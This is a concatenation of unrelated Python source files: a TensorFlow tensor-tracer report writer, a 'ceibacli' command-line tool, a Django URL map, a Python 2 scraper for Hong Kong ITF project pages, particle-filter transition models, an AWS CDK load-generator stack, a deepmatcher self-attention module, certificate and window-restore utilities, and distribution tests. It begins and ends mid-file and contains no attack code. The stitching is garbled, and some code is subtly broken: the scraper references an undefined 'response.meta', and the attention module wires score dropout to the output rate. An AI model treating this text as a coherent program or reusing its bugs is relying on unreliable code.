'w') except IOError as e: raise e def __enter__(self): return self._report_file def __exit__(self, unused_type, unused_value, unused_traceback): if self._report_file: self._report_file.close() class TTReportHandle(object): """Utility class responsible from creating a tensor tracer report.""" def __init__(self): self.instrument_records = {} self._report_file = None def instrument(self, name, explanation): self.instrument_records[name] = explanation def instrument_op(self, op, explanation): self.instrument(op.name, explanation) def instrument_tensor(self, tensor, explanation): self.instrument(tensor.name, explanation) def create_report_proto(self, tt_config, tt_parameters, tensor_trace_order, tensor_trace_points, collected_signature_types): """Creates and returns a proto that stores tensor tracer configuration. Args: tt_config: TensorTracerConfig object holding information about the run environment (device, # cores, # hosts), and tensor tracer version information. tt_parameters: TTParameters objects storing the user provided parameters for tensor tracer. tensor_trace_order: TensorTraceOrder object storing a topological order of the graph. tensor_trace_points: Progromatically added trace_points/checkpoints. collected_signature_types: The signature types collected, e,g, norm, max, min, mean... Returns: TensorTracerReport proto. """ report = tensor_tracer_pb2.TensorTracerReport() report.config.version = tt_config.version report.config.device = tt_config.device_type report.config.num_cores = tt_config.num_replicas report.config.num_hosts = tt_config.num_hosts report.config.num_cores_per_host = tt_config.num_replicas_per_host for core in tt_parameters.included_cores: report.config.included_cores.append(core) report.config.submode = tt_parameters.submode report.config.trace_mode = tt_parameters.trace_mode for signature_name, _ in sorted(collected_signature_types.items(), key=lambda x: x[1]): report.config.signatures.append(signature_name) tf_graph = tensor_trace_order.graph_order.graph report.graphdef.CopyFrom(tf_graph.as_graph_def()) for tensor in tensor_trace_order.graph_order.tensors: tensor_def = tensor_tracer_pb2.TensorTracerReport.TracedTensorDef() tensor_def.name = tensor.name if tensor.name in tensor_trace_order.tensorname_to_cache_idx: tensor_def.is_traced = True tensor_def.cache_index = ( tensor_trace_order.tensorname_to_cache_idx[tensor.name]) else: tensor_def.is_traced = False if tensor.name in tensor_trace_points: tensor_def.trace_point_name = tensor_trace_points[tensor.name] if tensor.name in self.instrument_records: tensor_def.explanation = self.instrument_records[tensor.name] elif tensor.op.name in self.instrument_records: tensor_def.explanation = self.instrument_records[tensor.op.name] report.tensordef[tensor.name].CopyFrom(tensor_def) return report def write_report_proto(self, report_proto, tt_parameters): """Writes the given report proto under trace_dir.""" gfile.MakeDirs(tt_parameters.trace_dir) report_path = os.path.join(tt_parameters.trace_dir, _TT_REPORT_PROTO) with gfile.GFile(report_path, 'wb') as f: f.write(report_proto.SerializeToString()) def create_report(self, tt_config, tt_parameters, tensor_trace_order, tensor_trace_points): """Creates a report file and writes the trace information.""" with OpenReportFile(tt_parameters) as self._report_file: self._write_config_section(tt_config, tt_parameters) self._write_op_list_section(tensor_trace_order.graph_order) self._write_tensor_list_section(tensor_trace_order.graph_order) self._write_trace_points(tensor_trace_points) self._write_cache_index_map_section(tensor_trace_order) self._write_reason_section() self._write_graph_section(tensor_trace_order.graph_order) def _write_trace_points(self, tensor_trace_points): """Writes the list of checkpoints.""" self._write_report('%s %s\n'%(_MARKER_SECTION_BEGIN, _SECTION_NAME_TENSOR_TRACER_CHECKPOINT)) for (tensor, checkpoint_name) in tensor_trace_points: self._write_report('%s %s\n'%(tensor.name, checkpoint_name)) self._write_report('%s %s\n'%(_MARKER_SECTION_END, _SECTION_NAME_TENSOR_TRACER_CHECKPOINT)) def _write_report(self, content): """Writes the given content to the report.""" line = '%s %s'%(_TRACER_LOG_PREFIX, content) if self._report_file: self._report_file.write(line) else: logging.info(line) def _write_config_section(self, tt_config, tt_parameters): """Writes the config section of the report.""" self._write_report('%s %s\n'%(_MARKER_SECTION_BEGIN, _SECTION_NAME_CONFIG)) self._write_report('%s %s\n'%(_FIELD_NAME_VERSION, tt_config.version)) self._write_report('%s %s\n'%(_FIELD_NAME_DEVICE, tt_config.device_type)) self._write_report('%s %s\n'%(_FIELD_NAME_TRACE_MODE, tt_parameters.trace_mode)) self._write_report('%s %s\n'%(_FIELD_NAME_SUBMODE, tt_parameters.submode)) if tt_parameters.included_cores: self._write_report('%s %s\n'%(_FIELD_NAME_NUM_REPLICAS, len(tt_parameters.included_cores))) else: self._write_report('%s %s\n'%(_FIELD_NAME_NUM_REPLICAS, tt_config.num_replicas)) self._write_report('%s %s\n'%(_FIELD_NAME_NUM_REPLICAS_PER_HOST, tt_config.num_replicas_per_host)) self._write_report('%s %s\n'%(_FIELD_NAME_NUM_HOSTS, tt_config.num_hosts)) self._write_report('%s %s\n'%(_MARKER_SECTION_END, _SECTION_NAME_CONFIG)) def _write_reason_section(self): """Writes the reason section of the report.""" self._write_report('%s %s\n'%(_MARKER_SECTION_BEGIN, _SECTION_NAME_REASON)) for key in sorted(self.instrument_records): self._write_report('"%s" %s\n'%(key, self.instrument_records[key])) self._write_report('%s %s\n'%(_MARKER_SECTION_END, _SECTION_NAME_REASON)) def _write_op_list_section(self, graph_order): """Writes the Op-list section of the report.""" self._write_report('%s %s\n'%(_MARKER_SECTION_BEGIN, _SECTION_NAME_OP_LIST)) self._write_report('%s %d\n'%(_FIELD_NAME_NUM_OPS, len(graph_order.operations))) for i in range(0, len(graph_order.operations)): op = graph_order.operations[i] line = '%d "%s" %s'%(i, op.name, op.type) for out_tensor in op.outputs: if out_tensor.name not in graph_order.tensor_to_idx: raise ValueError( 'out_tensor %s is not in tensor_to_idx'%out_tensor.name) line += ' %d'%graph_order.tensor_to_idx[out_tensor.name] line += '\n' self._write_report(line) self._write_report('%s %s\n'%(_MARKER_SECTION_END, _SECTION_NAME_OP_LIST)) def _write_tensor_list_section(self, graph_order): """Writes the tensor-list section of the report.""" self._write_report('%s %s\n'%(_MARKER_SECTION_BEGIN, _SECTION_NAME_TENSOR_LIST)) self._write_report('%s %d\n'%(_FIELD_NAME_NUM_TENSORS, len(graph_order.tensors))) for i in range(0, len(graph_order.tensors)): tensor = graph_order.tensors[i] line = '%d "%s"'%(i, tensor.name) consumers = tensor.consumers() consumers.sort(key=lambda op: op.name) for consumer_op in consumers: if consumer_op.name not in graph_order.op_to_idx: raise ValueError( 'consumer_op %s is not in op_to_idx'%consumer_op.name) line += ' %d'%graph_order.op_to_idx[consumer_op.name] line += '\n' self._write_report(line) self._write_report('%s %s\n'%(_MARKER_SECTION_END, _SECTION_NAME_TENSOR_LIST)) def _write_cache_index_map_section(self, tensor_trace_order): """Writes the mapping from cache index to tensor index to the report.""" self._write_report('%s %s\n'%(_MARKER_SECTION_BEGIN, _SECTION_NAME_CACHE_INDEX_MAP)) self._write_report('%s %d\n'%( _FIELD_NAME_NUM_CACHE_INDICES, len(tensor_trace_order.cache_idx_to_tensor_idx))) for cache_idx in range(0, len(tensor_trace_order.cache_idx_to_tensor_idx)): tensor_idx = tensor_trace_order.cache_idx_to_tensor_idx[cache_idx] line = '%d %d\n'%(cache_idx, tensor_idx) self._write_report(line) self._write_report('%s %s\n'%(_MARKER_SECTION_END, _SECTION_NAME_CACHE_INDEX_MAP)) def _write_graph_section(self, graph_order): """Writes the graph section of the report.""" self._write_report('%s %s\n'%(_MARKER_SECTION_BEGIN, _SECTION_NAME_GRAPH)) self._write_report('%s %s\n'%(_FIELD_NAME_TOPOLOGICAL_SORT_SUCCEED, not graph_order.contains_cycle)) l = list(graph_order.topological_order_or_cycle) for i in range(0, len(l)): self._write_report('%d "%s"\n'%(i, l[i].name)) self._write_report('%s %s\n'%(_MARKER_SECTION_END, _SECTION_NAME_GRAPH)) 1-10 """Module to read user input and perform the requested input action.""" import argparse import logging import sys import tempfile from pathlib import Path from typing import Tuple import pkg_resources import yaml from .actions import (add_jobs, compute_jobs, login_insilico, manage_jobs, query_properties, report_properties) from .input_validation import DEFAULT_WEB, validate_input from .utils import Options, exists logger = logging.getLogger(__name__) VERSION = pkg_resources.get_distribution('ceibacli').version def configure_logger(workdir: Path) -> None: """Set the logging infrasctucture.""" file_log = workdir / 'ceibacli_output.log' logging.basicConfig(filename=file_log, level=logging.INFO, format='%(asctime)s %(message)s', datefmt='[%I:%M:%S]') handler = logging.StreamHandler() handler.terminator = "" path = pkg_resources.resource_filename('ceibacli', '') logger.info(f"\nUsing ceibacli version: {VERSION}\n") logger.info(f"ceibacli path is: {path}\n") logger.info(f"Working directory is: {workdir.absolute().as_posix()}\n") def parse_user_arguments() -> Tuple[str, Options]: """Read the user arguments.""" parser = argparse.ArgumentParser("ceibacli") parser.add_argument('--version', action='version', version=f"%(prog)s {VERSION}") subparsers = parser.add_subparsers( help="Interact with the properties web service", dest="command") # input file parser input_parser = argparse.ArgumentParser(add_help=False) input_parser.add_argument("-i", "--input", type=exists, help="Yaml input file") # Command line arguments share common_parser = argparse.ArgumentParser(add_help=False) common_parser.add_argument("-w", "--web", default=DEFAULT_WEB, help="Web Service URL") common_parser.add_argument("-c", "--collection_name", help="Collection name") # Login into the web service login_parser = subparsers.add_parser("login", help="Log in to the Insilico web service") login_parser.add_argument("-w", "--web", default=DEFAULT_WEB, help="Web Service URL") login_parser.add_argument("-t", "--token", required=True, help="GitHub access Token") # Add new Job to the database add_parser = subparsers.add_parser( "add", help="Add new jobs to the database", parents=[common_parser]) add_parser.add_argument("-j", "--jobs", required=True, help="JSON file with the jobs to add") # Request new jobs to run from the database subparsers.add_parser("compute", help="Compute available jobs", parents=[input_parser]) # Report properties to the database subparsers.add_parser("report", help="Report the results back to the server", parents=[input_parser, common_parser]) # Request data from the database query_parser = subparsers.add_parser( "query", help="Query some properties from the database", parents=[common_parser]) # Manage the Jobs status subparsers.add_parser( "manage", help="Change jobs status", parents=[input_parser]) # Read the arguments args = parser.parse_args() if args.command is None: parser.print_help() sys.exit() return args.command, handle_input(args) def handle_input(args: argparse.Namespace) -> Options: """Check user input.""" input_file = getattr(args, "input", None) if input_file is None: user_input = {key: value for key, value in vars(args).items() if key not in {"command", "input"}} input_file = Path(tempfile.gettempdir()) / "user_input.yml" with open(input_file, 'w') as handler: yaml.dump(user_input, handler) return validate_input(input_file, action=args.command) def main(): """Parse the command line arguments to compute or query data from the database.""" command, opts = parse_user_arguments() # Initialize logger configure_logger(Path(".")) if command == "query": logger.info("QUERYING MOLECULAR PROPERTIES!") query_properties(opts) elif command == "compute": logger.info("COMPUTING PROPERTIES!") compute_jobs(opts) elif command == "report": logger.info("REPORTING RESULTS BACK TO THE SERVER!") report_properties(opts) elif command == "add": logger.info("ADDING NEW JOBS TO THE DATABASE") add_jobs(opts) elif command == "manage": logger.info("MANAGE JOBS STATE!") manage_jobs(opts) elif command == "login": logger.info("LOGGING INTO THE INSILICO WEB SERVICE!") login_insilico(opts) if __name__ == "__main__": main() import inspect from typing import Callable from app.adapters import orm, redis_event_publisher from app.service_layer import unit_of_work def bootstrap( start_orm: bool = True, uow: unit_of_work.UnitOfWork = unit_of_work.SQLAlchemyUnitOfWork(), ) -> unit_of_work.UnitOfWork: if start_orm: orm.start_mappers() return uow taotao-cloud-python/taotao-cloud-oldboy/day77-cmdb/cmdb/AutoCmdb/web/urls.py from django.conf.urls import url from django.conf.urls import include from django.contrib import admin from web.views import account from web.views import home from web.views import asset from web.views import user urlpatterns = [ url(r'^login.html$', account.LoginView.as_view()), url(r'^logout.html$', account.LogoutView.as_view()), url(r'^index.html$', home.IndexView.as_view()), url(r'^cmdb.html$', home.CmdbView.as_view()), url(r'^asset.html$', asset.AssetListView.as_view()), url(r'^assets.html$', asset.AssetJsonView.as_view()), url(r'^asset-(?P\d+)-(?P\d+).html$', asset.AssetDetailView.as_view()), url(r'^add-asset.html$', asset.AddAssetView.as_view()), url(r'^users.html$', user.UserListView.as_view()), url(r'^user.html$', user.UserJsonView.as_view()), url(r'^chart-(?P\w+).html$', home.ChartView.as_view()), ] howawong/hong_kong_itf_crawlerscraper.py import requests import json from lxml import html from multiprocessing import Pool import signal def init_worker(): signal.signal(signal.SIGINT, signal.SIG_IGN) def get_page_links(text): root = html.fromstring(text) links = root.xpath("//table[@id=\"tblPrjSummary\"]/tr[@class=\"prjSearchResult\"]/td[@class=\"tdPrjRef\"]/a/@href") return ["http://www.itf.gov.hk/l-eng/" + link for link in links] def get_page_detail(pair): link, cookies = pair detail_response = requests.get(link, cookies=cookies) root = html.fromstring(detail_response.text) sels = root.xpath("//table[@id=\"tblPrjProfile\"]/tr") count = len(sels) d = {} if count > 0: for sel in sels: key = "" for text in sel.xpath("td[@class=\"prjProfile1\"]//text()"): key = key + text key = key.strip() value = "" values = [v.strip() for v in sel.xpath("td[@class=\"prjProfile2\"]//text()")] value = "".join(values).strip() d[key] = value return d else: print "fucked %s "% (response.meta['title']) raise Exception("No record found") url = "http://www.itf.gov.hk/l-eng/Prj_Search.asp?code=108" response = requests.get(url) root = html.fromstring(response.text) token = root.xpath("//input[@name=\"token\"]/@value")[0] print token print response.cookies options = root.xpath("//select[@id=\"techArea\"]/option") output = {} for option in options: category = option.xpath("text()")[0] value = option.xpath("@value")[0] print category + " [" + value + "]" formdata = {"techArea": value, 'token': token, 'submit': 'Search'} page_response = requests.post('http://www.itf.gov.hk/l-eng/Prj_SearchResult.asp', data=formdata, cookies=response.cookies) root = html.fromstring(page_response.text) total_pages = int("".join([x.strip() for x in root.xpath("//table[@id=\"prjSearchPageTable\"]//tr[@class=\"prjSearchResult\"]/td//text()")]).split(" of ")[1].strip()) details = [] for i in range(1, total_pages + 1): print "Page:%d" % (i) formdata = {"techArea": value, 'token': token, 'submit': 'Search', 'page_no': str(i)} page_response = requests.post('http://www.itf.gov.hk/l-eng/Prj_SearchResult.asp', data=formdata, cookies=response.cookies) links = get_page_links(page_response.text) p = Pool(10, init_worker) try: details_per_page = p.map(get_page_detail, [(link, response.cookies) for link in links]) for detail in details_per_page: print json.dumps(detail) details = details + details_per_page except KeyboardInterrupt: p.terminate() p.join() finally: p.close() print "Number of Projects %d" % (len(details)) output[category] = details print "Writing File..." f = open("projects_uncleansed.json", "w") f.write(json.dumps(output)) f.close() filterflow/transition/linear.py import tensorflow as tf import tensorflow_probability as tfp from filterflow.base import State from filterflow.transition.base import TransitionModelBase class LinearTransitionModel1d(TransitionModelBase): def __init__(self, scalar: tf.Tensor, add_term: tf.Tensor, noise: tfp.distributions.Distribution, name='RandomWalkModel'): super(LinearTransitionModel1d, self).__init__(name=name) self._scalar = scalar self._add_term = add_term self._noise = noise def push_particles(self, particles): pushed_particles = self._scalar * particles pushed_particles = pushed_particles + self._add_term return pushed_particles def loglikelihood(self, prior_state: State, proposed_state: State, inputs: tf.Tensor): """Computes the loglikelihood of an observation given proposed particles :param prior_state: State State at t-1 :param proposed_state: State Some proposed State for which we want the likelihood given previous state :param inputs: tf.Tensor Input for transition model :return: a tensor of loglikelihoods for all particles in proposed state :rtype: tf.Tensor """ batch_size, n_particles, dim = prior_state.particles.shape pushed_particles = self.push_particles(prior_state.particles) diff = proposed_state.particles - pushed_particles log_prob = self._noise.log_prob(diff) return tf.reshape(log_prob, [batch_size, n_particles]) def sample(self, state: State, inputs: tf.Tensor, seed=None): """Samples a new proposed state conditionally on prior state and some inputs :param state: State State of the filter at t-1 :param inputs: tf.Tensor Input for transition model :param seed: tf.Tensor Seed :return: proposed State :rtype: State """ pushed_particles = self.push_particles(state.particles) res = pushed_particles + self._noise.sample([state.batch_size, state.n_particles], seed=seed) return res class LinearTransitionModel(TransitionModelBase): def __init__(self, scalar_matrix: tf.Tensor, add_term: tf.Tensor, noise: tfp.distributions.Distribution, name='RandomWalkModel'): super(LinearTransitionModel, self).__init__(name=name) self._scalar_matrix = scalar_matrix self._add_term = add_term self._noise = noise def push_particles(self, particles): pushed_particles = tf.linalg.matvec(self._scalar_matrix, particles) pushed_particles = pushed_particles + self._add_term return pushed_particles def loglikelihood(self, prior_state: State, proposed_state: State, inputs: tf.Tensor): """Computes the loglikelihood of an observation given proposed particles :param prior_state: State State at t-1 :param proposed_state: State Some proposed State for which we want the likelihood given previous state :param inputs: tf.Tensor Input for transition model :return: a tensor of loglikelihoods for all particles in proposed state :rtype: tf.Tensor """ pushed_particles = self.push_particles(prior_state.particles) diff = proposed_state.particles - pushed_particles return self._noise.log_prob(diff) def sample(self, state: State, inputs: tf.Tensor): """Samples a new proposed state conditionally on prior state and some inputs :param state: State State of the filter at t-1 :param inputs: tf.Tensor Input for transition model :return: proposed State :rtype: State """ pushed_particles = self.push_particles(state.particles) res = pushed_particles + self._noise.sample([state.batch_size, state.n_particles]) return res import os.path from aws_cdk.aws_s3_assets import Asset from aws_cdk import ( aws_ec2 as ec2, aws_iam as iam, core ) dirname = os.path.dirname(__file__) class LoadGenStack(core.Stack): def __init__(self, scope: core.Construct, id: str, vpc, **kwargs) -> None: super().__init__(scope, id, **kwargs) amzn_linux = ec2.MachineImage.latest_amazon_linux( generation=ec2.AmazonLinuxGeneration.AMAZON_LINUX_2, edition=ec2.AmazonLinuxEdition.STANDARD, virtualization=ec2.AmazonLinuxVirt.HVM, storage=ec2.AmazonLinuxStorage.GENERAL_PURPOSE ) # Allow to be managed via SSM role = iam.Role(self, "InstanceSSM", assumed_by=iam.ServicePrincipal("ec2.amazonaws.com")) role.add_managed_policy(iam.ManagedPolicy.from_aws_managed_policy_name("service-role/AmazonEC2RoleforSSM")) ## Setup key_name for EC2 instance login if you don't use Session Manager ## Create keypair in AWS console ## Change .any_ipv4 to a specific IP address/range to reduce attack surface #key_name = "{keypair}" #loadgen.allow_ssh_access_from(ec2.Peer.any_ipv4()) #loadgen.allow_ssh_access_from(ec2.Peer.ipv4('10.44.0.0/24')) #loadgen.instance.instance.add_property_override("KeyName", key_name) mySecurityGroup = ec2.SecurityGroup( self, 'Loadgen SecurityGroup', vpc=vpc, security_group_name="loadgen-ssh-access-sg", description= 'Allow ssh access to ec2 instances from anywhere', allow_all_outbound=True ) loadgen = ec2.Instance( self, id="LoadGen", vpc=vpc, instance_name="LoadGen", instance_type=ec2.InstanceType("m5.xlarge"), machine_image=amzn_linux, role = role, security_group = mySecurityGroup ) # We use session manager, but if you want to deploy an ssh key as above, you will need to open up ssh #mySecurityGroup.add_ingress_rule(ec2.Peer.any_ipv4(), ec2.Port.tcp(22), 'allow public ssh access') asset = Asset(self, "Asset", path=os.path.join(dirname, "assets/load_deploy.sh")) local_path = loadgen.user_data.add_s3_download_command( bucket=asset.bucket, bucket_key=asset.s3_object_key ) loadgen.user_data.add_execute_file_command(file_path=local_path) asset.grant_read(loadgen.role) ec2.CfnEIP(self, id="LoadGenHostEIP", domain="vpc", instance_id=loadgen.instance_id) core.CfnOutput( self, id="LoadGenPrivateIP", value=loadgen.instance_private_ip, description="LOADGEN Private IP", export_name=f"{self.region}:{self.account}:{self.stack_name}:loadgen-private-ip" ) core.CfnOutput( self, id="LoadgenPublicIP", value=loadgen.instance_public_ip, description="LOADGEN Public IP", export_name=f"{self.region}:{self.account}:{self.stack_name}:loadgen-public-ip" ) Sword-holder/deepmatcher import six import deepmatcher as dm import torch import torch.nn as nn from torch.autograd import Variable from . import _utils from ..batch import AttrTensor class RNN(dm.modules.RNN, dm.WordContextualizer): """Multi layered RNN based Word Contextualizer. Supports dropout and residual / highway connections. Takes the same parameters as the :class:`~deepmatcher.modules.RNN` module. """ pass # class CNN(dm.WordContextualizer): # pass class SelfAttention(dm.WordContextualizer): """__init__(heads=1, hidden_size=None, input_dropout=0, alignment_network='decomposable', scale=False, score_dropout=0, value_transform_network=None, value_merge='concat', transform_dropout=0, output_transform_network=None, output_dropout=0, bypass_network='highway', input_size=None) Self Attention based Word Contextualizer. Supports `vanilla self attention `__ and `multi-head self attention `__. Args: heads (int): Number of attention heads to use. Defaults to 1. hidden_size (int): The default hidden size of the `alignment_network` and transform networks, if they are not disabled. input_dropout (float): If non-zero, applies dropout to the input to this module. Dropout probability must be between 0 and 1. alignment_network (string or :class:`deepmatcher.modules.AlignmentNetwork` or callable): The neural network takes the input sequence, aligns the words in the sequence with other words in the sequence, and returns the corresponding alignment score matrix. Argument must specify a :ref:`align-op` operation. scale (bool): Whether to scale the alignment scores by the square root of the `hidden_size` parameter. Based on `scaled dot-product attention `__ score_dropout (float): If non-zero, applies dropout to the alignment score matrix. Dropout probability must be between 0 and 1. value_transform_network (string or :class:`~deepmatcher.modules.Transform` or callable): For each word embedding in the input sequence, SelfAttention takes a weighted average of the aligning values, i.e., the aligning word embeddings based on the alignment scores. This parameter specifies the neural network to transform the values (word embeddings) before taking the weighted average. Argument must be None or specify a :ref:`transform-op` operation. If the argument is a string, the hidden size of the transform operation is computed as :code:`hidden_size // heads`. If argument is None, and `heads` is 1, then the values are not transformed. If argument is None and `heads` is > 1, then a 1 layer highway network without any non-linearity is used. The hidden size for this is computed as mentioned above. value_merge (string or :class:`~deepmatcher.modules.Merge` or callable): For each word embedding in the input sequence, each SelfAttention head produces one corresponding vector as output. This parameter specifies how to merge the outputs of all attention heads for each word embedding. Concatenates the outputs of all heads by default. Argument must specify a :ref:`merge-op` operation. transform_dropout (float): If non-zero, applies dropout to the output of the `value_transform_network`, if applicable. Dropout probability must be between 0 and 1. output_transform_network (string or :class:`~deepmatcher.modules.Transform` or callable): For each word embedding in the input sequence, SelfAttention produces one corresponding vector as output. This neural network specifies how to transform each of these output vectors to obtain a hidden representation of size `hidden_size`. Argument must be None or specify a :ref:`transform-op` operation. If argument is None, and `heads` is 1, then the output vectors are not transformed. If argument is None and `heads` is > 1, then a 1 layer highway network without any non-linearity is used. output_dropout (float): If non-zero, applies dropout to the output of the `output_transform_network`, if applicable. Dropout probability must be between 0 and 1. bypass_network (string or :class:`Bypass` or callable): The bypass network (e.g. residual or highway network) to use. The input word embedding sequence to this module is considered as the raw input to the bypass network and the final output vector sequence (output of `value_merge` or `output_transform_network` if applicable) is considered as the transformed input. Argument must specify a :ref:`bypass-op` operation. If None, does not use a bypass network. input_size (int): The number of features in the input to the module. This parameter will be automatically specified by :class:`LazyModule`. """ def _init(self, heads=1, hidden_size=None, input_dropout=0, alignment_network='decomposable', scale=False, score_dropout=0, value_transform_network=None, value_merge='concat', transform_dropout=0, output_transform_network=None, output_dropout=0, bypass_network='highway', input_size=None): hidden_size = hidden_size if hidden_size is not None else input_size self.alignment_networks = nn.ModuleList() for head in range(heads): self.alignment_networks.append( dm.modules._alignment_module(alignment_network, hidden_size)) if value_transform_network is None and heads > 1: value_transform_network = dm.modules.Transform( '1-layer-highway', non_linearity=None, hidden_size=hidden_size // heads) self.value_transform_network = dm.modules._transform_module( value_transform_network, hidden_size // heads) self.value_merge = dm.modules._merge_module(value_merge) self.softmax = nn.Softmax(dim=2) if output_transform_network is None and heads > 1: output_transform_network = dm.modules.Transform( '1-layer-highway', non_linearity=None, hidden_size=hidden_size) self.output_transform_network = dm.modules._transform_module( output_transform_network, hidden_size) self.input_dropout = nn.Dropout(input_dropout) self.transform_dropout = nn.Dropout(transform_dropout) self.score_dropout = nn.Dropout(output_dropout) self.output_dropout = nn.Dropout(output_dropout) self.bypass_network = dm.modules._bypass_module(bypass_network) self.heads = heads self.scale = scale self.hidden_size = hidden_size def _forward(self, input_with_meta): input = self.input_dropout(input_with_meta.data) values_aligned = [] for head in range(self.heads): # Dims: batch x len1 x len2 alignment_scores = self.score_dropout(self.alignment_networks[head](input, input)) if self.scale: alignment_scores = alignment_scores / torch.sqrt(self.hidden_size) if input_with_meta.lengths is not None: mask = _utils.sequence_mask(input_with_meta.lengths) mask = mask.unsqueeze(1) # Make it broadcastable. alignment_scores.data.masked_fill_(~mask, -float('inf')) normalized_scores = self.softmax(alignment_scores) if self.value_transform_network is not None: values_transformed = self.transform_dropout( self.value_transform_network(input)) else: values_transformed = input # Dims: batch x len1 x channels values_aligned.append(torch.bmm(normalized_scores, values_transformed)) values_merged = self.value_merge(*values_aligned) output = values_merged if self.output_transform_network: output = self.output_transform_network(output) output = self.output_dropout(output) final_output = self.bypass_network(output, input) return AttrTensor.from_old_metadata(final_output, input_with_meta) 0 from scrapy.crawler import CrawlerProcess from crawler.spiders.eu_data_spider import EuDataSpiderSpider process = CrawlerProcess({ 'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', 'FEED_FORMAT': 'json', 'FEED_URI': '../../data/01_crawled/eu_data/metadata.json' }) process.crawl(EuDataSpiderSpider, output_directory='../../data/01_crawled/eu_data/text/', path_to_file='../../data/00_raw/extracted/eu_data_preprocessed.csv') process.start()""" Certificate Generator - Generate thousands of certificates at just one click Author : Date : 28/03/21 """ from PIL import Image, ImageDraw, ImageFont import os import csv # font for name on certificate font = ImageFont.truetype('merriweather-italic.ttf', 100) # open csv file containing name with open('names.csv') as names_file: names = csv.reader(names_file) # iterate over names for name in names: # open certificate image image = Image.open('certificate.jpg') draw = ImageDraw.Draw(image) # find dimensions of text on certificate width_of_text, height_of_text = draw.textsize(name[0], font) # find x coordinate of starting point of text such that it is horizontally centered x_coordinate = (image.width - width_of_text) / 2 # draw the text on certificate draw.text((x_coordinate, 625), name[0], font=font, fill=(255, 255, 255)) # if Output dir does not exist then create it if not os.path.exists('./Output'): os.mkdir('./Output') # save edited image in Output dir image.save("Output/{0}.jpg".format(name[0])) #!/usr/bin/env python # -*- coding: utf-8 -*- """Testing suite for SkewStudent class. """ from __future__ import print_function, division import unittest as ut import numpy as np from scipy.stats import t from skewstudent import SkewStudent __author__ = "" __email__ = "" class SkewStudentTestCase(ut.TestCase): """Test SkewStudent distribution class.""" def test_init(self): """Test __init__.""" skewt = SkewStudent() self.assertIsInstance(skewt.eta, float) self.assertIsInstance(skewt.lam, float) eta, lam = 5., -.2 skewt = SkewStudent(eta=eta, lam=lam) self.assertEqual(skewt.eta, eta) self.assertEqual(skewt.lam, lam) def test_pdf(self): """Test pdf method.""" skewt = SkewStudent() num = 50 arg = np.linspace(-1, 1, num) pdf = skewt.pdf(arg) self.assertEqual(pdf.shape[0], num) self.assertIsInstance(skewt.pdf(0), float) def test_cdf(self): """Test cdf method.""" skewt = SkewStudent() num = 50 arg = np.linspace(-1, 1, num) cdf = skewt.cdf(arg) self.assertEqual(cdf.shape[0], num) self.assertIsInstance(skewt.cdf(0), float) def test_ppf(self): """Test ppf method.""" skewt = SkewStudent() num = 50 arg = np.linspace(.01, .99, num) ppf = skewt.ppf(arg) self.assertEqual(ppf.shape[0], num) self.assertIsInstance(skewt.ppf(.5), float) def test_rvs(self): """Test ppf method.""" skewt = SkewStudent() rvs = skewt.rvs() self.assertIsInstance(rvs, float) size = 2 rvs = skewt.rvs(size=size) self.assertIsInstance(rvs, np.ndarray) self.assertEqual(rvs.shape, (size, )) size = (2, 3) rvs = skewt.rvs(size=size) self.assertIsInstance(rvs, np.ndarray) self.assertEqual(rvs.shape, size) def test_compare_with_t(self): """Compare with standard t distribution.""" eta = 5 skewt = SkewStudent(eta=eta, lam=0) scale = 1/(eta/(eta-2))**.5 standt = t(eta, scale=scale) arg = np.linspace(-2, 2, 100) np.testing.assert_array_almost_equal(skewt.pdf(arg), standt.pdf(arg)) np.testing.assert_array_almost_equal(skewt.cdf(arg), standt.cdf(arg)) arg = np.linspace(.01, .99, 100) np.testing.assert_array_almost_equal(skewt.ppf(arg), standt.ppf(arg)) if __name__ == '__main__': ut.main() #!/usr/bin/env python3 # -*- coding:utf-8 -*- # ----------- # SPDX-License-Identifier: MIT # Copyright (c) 2021 # uuid = f6792b10-b7f5-11eb-89b8-59b62252b88f # author = # email = # date = 2021-05-18 # ----------- """ """ # ------------ # System Modules - Included with Python import sys import logging import math # ------------ # 3rd Party - From pip import click # ------------ # Custom Modules from .common import run_cmd, read_json # ------------ # Custom Modules # ------------- # Logging log = logging.getLogger(__name__) # ------------- def move_window(wid, x, y, w, h, title, verbose=False): """ Move the window specified by is (wid) to the new x, y offset and the new width (w) and height (h) $ wmctrl -ir {wid} -e 0,{x},{y},{w},{h} # Parameters wid:str - The id of the window to move x:int - x-coordinate of the upper left corner y:int - y-coordinate of the upper left corner w:int - width of the window h:int - height of the window title:str - The title information of the window verbose:bool - used to indicate we want more verbose information """ if verbose: log.info(f'wmctrl -ir {wid} -e 0,{x},{y},{w},{h} " -> {title}"') # restore the correct size and position on the desktop results = run_cmd( [ "wmctrl", "-ir", wid, "-e", f"0,{x},{y},{w},{h}", ] ) for r in results: log.info(r) def set_desktop(wid, deskid, title, verbose=False): """ Given the window (wid) move it to the virtual desktop (deskid) $ wmctrl -ir {wid} -t {deskid} # Parameters wid:str - The id of the window to move title:str - The title information of the window verbose:bool - used to indicate we want more verbose information """ if verbose: log.info(f'wmctrl -ir {wid} -t {deskid} " -> {title}"') results = run_cmd( [ "wmctrl", "-ir", wid, "-t", deskid, ] ) for r in results: log.info(r) def position_adjustments(x, y, fine_tuning, title): """ Given the window x,y corner offset and the window title, determine if the coordinates need to be adjusted. # Parameters x:int - x-coordinate of the upper left corner y:int - y-coordinate of the upper left corner fine_tuning:dict - title:str - The title information of the window """ if "window_adjustments" in fine_tuning: for adjustment in fine_tuning["window_adjustments"]: if adjustment["title_text"] in title: return ( x + adjustment["x"], y + adjustment["y"], ) return ( math.floor(x * fine_tuning["scale_x"]), math.floor(y * fine_tuning["scale_y"]), ) @click.command("restore") @click.option("--verbose", is_flag=True, help="Display more verbose output.") @click.pass_context def restore(*args, **kwargs): """ # Usage """ # Extract the configuration file from the click context paths = args[0].obj["paths"] positions_fine_tuning = paths["settings"] items = read_json(paths["locations"]) if items is None: log.info("Nothing to restore!") return # ---------------------- # JSON data structure # [ # "0x02600008", # Window ID (Hex) # "2", # Desktop number # "70", # x-offset # "460", # y-offset # "940", # width # "500", # height # "vidar", # "\ud83c\udfe1-parents-only", # "-", # "Discord" # ] for p in items: wid, deskid, x, y, w, h, *title = p title = " ".join(title) x, y = position_adjustments(int(x), int(y), positions_fine_tuning, title) # -------------- # 1. move to the correct position on the active desktop move_window(wid, x, y, w, h, title, verbose=kwargs["verbose"]) # -------------- # 2. move to the correct desktop once it is in the correct position set_desktop(wid, deskid, title, verbose=kwargs["verbose"]) # We are going 